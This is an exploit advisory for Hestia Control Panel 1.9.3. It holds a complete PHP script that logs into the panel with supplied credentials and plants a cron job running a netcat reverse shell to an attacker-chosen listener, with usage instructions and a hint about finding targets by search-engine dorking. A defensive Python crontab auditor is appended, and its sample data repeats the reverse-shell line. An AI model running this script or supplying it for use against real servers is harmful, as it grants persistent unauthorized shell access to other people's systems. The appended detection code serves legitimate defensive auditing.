Hestia Control Panel 1.9.3 Code Execution

=============================================================================================================================================
| # Title : Hestia Control Panel 1.9.3 PHP code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://hestiacp.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engines.

[+] Code Description: This code is a PHP exploit that targets the cron job system on a specific server: after logging in to the panel, it adds a cron job whose command is then executed on the server.

(Related: https://packetstorm.news/files/id/189606/ ; Related CVE numbers: )

[+] save code as poc.php.

[+] Usage: php script.php <url> <username> <password> <listener_ip> <listener_port>

[+] Payload :


<?php

// Walk the panel's multi-step login form: fetch the form token, submit the username, then the password.
function login($url, $username, $password) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url/login/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$token_response = curl_exec($ch);
curl_close($ch);

if (!preg_match('/<input type="hidden" name="token" value="(.*?)">/', $token_response, $matches)) {
echo "Failed to retrieve login token\n";
return [null, null];
}

$token = $matches[1];
$postData = http_build_query([
'token' => $token,
'user' => $username
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url/login/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$username_response = curl_exec($ch);
curl_close($ch);

if (!preg_match('/<input type="hidden" name="token" value="(.*?)">/', $username_response, $matches)) {
echo "Failed to retrieve password token\n";
return [null, null];
}

$token = $matches[1];
$postData = http_build_query([
'token' => $token,
'password' => $password
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url/login/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
$password_response = curl_exec($ch);
curl_close($ch);

if (strpos($password_response, 'login') !== false) {
echo "Login failed!\n";
return [null, null];
}

echo "Login successful!\n";
return ['cookies.txt', $token];
}

// Submit a new cron job through the panel's /add/cron/ form using the authenticated session.
function create_cron($url, $cookieFile, $listener_ip, $listener_port, $token) {
$cron_payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $listener_ip $listener_port >/tmp/f";

$postData = http_build_query([
'token' => $token,
'ok' => 'Add',
'v_cmd' => $cron_payload,
'v_min' => '*',
'v_hour' => '*',
'v_day' => '*',
'v_month' => '*',
'v_wday' => '*'
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url/add/cron/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieFile);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$cron_response = curl_exec($ch);
curl_close($ch);

if (strpos($cron_response, 'cron') !== false) {
echo "Cronjob successfully generated!\n";
return true;
}

echo "Failed to create cronjob.\n";
return false;
}

// Entry point: read the five positional arguments from the command line.
if ($argc < 6) {
echo "Usage: php script.php <url> <username> <password> <listener_ip> <listener_port>\n";
exit(1);
}

$url = $argv[1] ?? '';
$username = $argv[2] ?? '';
$password = $argv[3] ?? '';
$listener_ip = $argv[4] ?? '';
$listener_port = $argv[5] ?? '';

list($cookieFile, $token) = login($url, $username, $password);
if ($cookieFile) {
if (create_cron($url, $cookieFile, $listener_ip, $listener_port, $token)) {
echo "Cronjob created, waiting for connection...\n";
}
}
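
A defender-side check, added here and not part of the original advisory: it parses crontab entries (constructed sample lines, one of which has the shape the PoC's v_cmd field produces) and flags commands carrying the indicators of a shell piped to a network socket, which is what an auditor of a panel host would want to run over user crontabs after a suspected login compromise. The sample paths, the IP address and the indicator names are assumptions.

```python
import re

# Constructed sample crontab for this example (not taken from a real host):
# two routine entries next to one of the shape the PoC above submits via v_cmd.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/hestia/bin/v-backup-user admin
* * * * * rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 198.51.100.7 4444 >/tmp/f
30 2 * * 0 /usr/bin/certbot renew --quiet
"""

# Indicators of a shell being wired to a network socket (names are ours).
INDICATORS = {
    "named_pipe": re.compile(r"\bmkfifo\b"),
    "netcat": re.compile(r"\b(nc|ncat|netcat)\b"),
    "interactive_shell": re.compile(r"\b(ba)?sh\s+-i\b"),
    "dev_tcp": re.compile(r"/dev/tcp/"),
}

# Five schedule fields followed by the command.
CRON_LINE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(.*)$")


def parse_crontab(text):
    """Yield (schedule, command) for each non-empty, non-comment crontab line."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m:
            yield m.group(1), m.group(2)


def audit_cron_command(command):
    """Return the names of every indicator matched by a cron command."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def audit_crontab(text):
    """Return (schedule, command, hits) for every entry that matches an indicator.

    An every-minute schedule is only reported as context on an already
    suspicious command; on its own it is not a finding.
    """
    findings = []
    for schedule, command in parse_crontab(text):
        hits = audit_cron_command(command)
        if hits and schedule.split() == ["*"] * 5:
            hits.append("every_minute")
        if hits:
            findings.append((schedule, command, hits))
    return findings


if __name__ == "__main__":
    for schedule, command, hits in audit_crontab(SAMPLE_CRONTAB):
        print(f"[!] {schedule}  {command}\n    indicators: {', '.join(hits)}")
```

Run it against `crontab -l -u <user>` output for each panel user; a hit is a reason to pull the panel's web and cron logs for the matching time window.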

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================